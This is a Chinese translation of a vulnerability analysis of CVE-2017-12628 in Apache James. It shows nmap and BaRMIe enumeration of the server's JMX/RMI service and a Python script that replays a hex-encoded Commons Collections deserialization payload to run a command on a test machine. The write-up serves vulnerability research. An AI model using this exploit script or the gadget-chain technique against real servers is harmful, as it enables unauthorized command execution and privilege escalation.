標籤:

Apache James 任意代碼執行漏洞分析

02-05

引言

本文由野火研習社-rourou翻譯自Analysis of CVE-2017-12628,若有不準之處,歡迎指正。

0x00 簡介

  • Apache James :Apache James 簡稱 James, 是 Java Apache Mail Enterprise Server的縮寫。James 是100%基於Java的電子郵件伺服器。它是一種獨立的郵件伺服器,並提供了一個完整的電子郵件解決方案,用來收、發電子郵件。
  • ysoserial:一款github上的java反序列化利用工具https://github.com/angelwhu/ysoserial
  • BaRMIe:是使用枚舉的方法攻擊Java RMI(遠程方法調用)服務的工具。https://github.com/NickstaDB/BaRMIe/releases/latest

0x01 環境分析

在虛擬機中運行Apache James 3.0.0(3.0.1修復已修復)服務,可以注意到一件事就是在Apache James的lib目錄下存commons-collections-3.2.1.jar 我們可以使用ysoserial來生成一個使用該庫的POP小工具鏈,可以通過反序列化實現任意的命令執行。

0x02 分析步驟

啟動Apache James服務

在James目錄下進入bin執行run.sh文件來啟動James伺服器,在虛擬機上使用netstat和結合本地使用nmap命令發現主機上存在一個Java RMI埠偵聽。

下面是掃描結果:

C:ToolsNmap>nmap.exe -sV --version-all -p33148,46299 192.168.174.40nnStarting Nmap 7.31 ( https://nmap.org ) at 2017-10-22 12:37 GMT Daylight TimenNmap scan report for 192.168.174.40nnHost is up (0.00076s latency).nnPORT STATE SERVICE VERSIONn33148/tcp open rmiregistry Java RMIn46299/tcp open tcpwrappedn

使用BaRMIe枚舉此服務表明它是RMI對象服務而不是RMI註冊表服務,因此BaRMIe無法遠程攻擊該服務。

執行結果如下:

C:ToolsBaRMIe>java -jar BaRMIe.jar 192.168.174.40 33148nnScanning 1 target(s) for objects exposed via an RMI registry...nn192.168.174.40:33148 appears to be an RMI object endpoint, rather than a registry.n

在虛擬機上運行nmap掃描本身顯示Apache James RMI註冊表服務綁定到127.0.0.1:9999。 將BaRMIe複製到虛擬機來枚舉這個RMI註冊表,發現外部的RMI服務實際上是JMX對象的RMI對象服務。

結果如下 :

RMI Registry at 127.0.0.1:9999nnObjects exposed: 1nnObject 1nn Name: jmxrminn Endpoint: 127.0.1.1:33148nn Classes: 3nn Class 1nn Classname: javax.management.remote.rmi.RMIServerImpl_Stubn

使用BaRMIe的攻擊模式與通用JMX漏洞和Commons Collections 3.2.1 payload,可以利用此服務執行任意命令,導致本地許可權升級。 除此之外,還值得注意的是,如果伺服器使用老版本的Java運行時環境(<= 6u131,7u121或8u112),那麼這個時候還能利用ysoserial RMI註冊表對此漏洞攻擊。

0x03 Exp

這是一個本地提權漏洞,但是鑒於JMX對象在外部暴露出來,這也是可以被遠程利用的。

為了對漏洞利用證明,可以在虛擬機上使用tcpdump來捕獲到JMX對象服務的流量,同時運行BaRMIe JMX漏洞利用命令touch fooobaaar

命令如下 :

sudo tcpdump -i lo -w apache-james-jmx-exploit.pcap port 33148n

在本地使用python腳本重放Exploit數據包

下面是Exp代碼 :

import socketnnpackets = [n "4a524d4900024b",n "RECV",n "00093132372e302e312e310000000050aced000577220000000000000002000000000000000000000000000000000001f6b6898d8bf28643757200185b4c6a6176612e726d692e7365727665722e4f626a49443b871300b8d02c647e02000070787000000001737200156a6176612e726d692e7365727665722e4f626a4944a75efa128ddce55c0200024a00066f626a4e756d4c000573706163657400154c6a6176612f726d692f7365727665722f5549443b7078709c4cdbcfdd205cf8737200136a6176612e726d692e7365727665722e5549440f12700dbf364f12020003530005636f756e744a000474696d65490006756e6971756570787080020000015f4347bba08304129e77088000000000000015737200126a6176612e726d692e6467632e4c65617365b0b5e2660c4adc340200024a000576616c75654c0004766d69647400134c6a6176612f726d692f6467632f564d49443b70787000000000000927c0737200116a6176612e726d692e6467632e564d4944f8865bafa4a56db60200025b0004616464727400025b424c000375696471007e0003707870757200025b42acf317f8060854e002000070787000000008beccd729e295d7ea7371007e000580010000015f43592e64224416a1",n "RECV",n "50aced000577229c4cdbcfdd205cf88304129e0000015f4347bba08002fffffffff0e074eaad0caea8737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000707870770c000000000010000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b707870740001417372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8341899020000707870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e0003707870767200116a6176612e6c616e672e52756e74696d6500000000000000000000007078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000707870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a65637400000000000000000000007078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007078700000000174000f746f75636820666f6f6f6261616172740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000070787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c64707870000000010000000077080000001000000000787878",n "RECV",n]nnsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)nsock.connect(("192.168.174.40", 33148))nnfor packet in packets:n if packet == "RECV":n sock.recv(4096)n else:n sock.sendall(packet.decode("hex"))nnsock.close()n

0x04 分析

執行結果

在本地運行此腳本重放Exploit數據包後,可以證明此漏洞是可以遠程利用的。

探究!

在重啟Apache James服務後,這個Poc將失效。 我們可以捕獲更多數據包捕獲來進行比較,並進一步的測試,通過分析得到這些數據包的一些差異。 以下是此數據包的前27個位元組:

藍色 顯示的部分是動態的,但是它們的值可以從伺服器返回的先前的響應數據包中提取出來。

橙色 突出顯示的部分是伺服器啟動時生成的RMI對象標識符。 該值來自RMI註冊表服務,它僅在本地在伺服器上進行偵聽。 如果使用其他方式獲取這個8位元組的值,那麼這個遠程命令執行漏洞也是可以利用的。


推薦閱讀:

哪家公司的漏洞獎勵最高?
你的電腦也會中招!英特爾最近的漏洞讓科技界雞犬不寧
如何保護伺服器免受 Meltdown 和 Spectre 漏洞的波及
文件解析漏洞匯總
如何評價 FreeBuf 最近的新產品「漏洞盒子」?

TAG:Apache | 数据分析 | 漏洞 |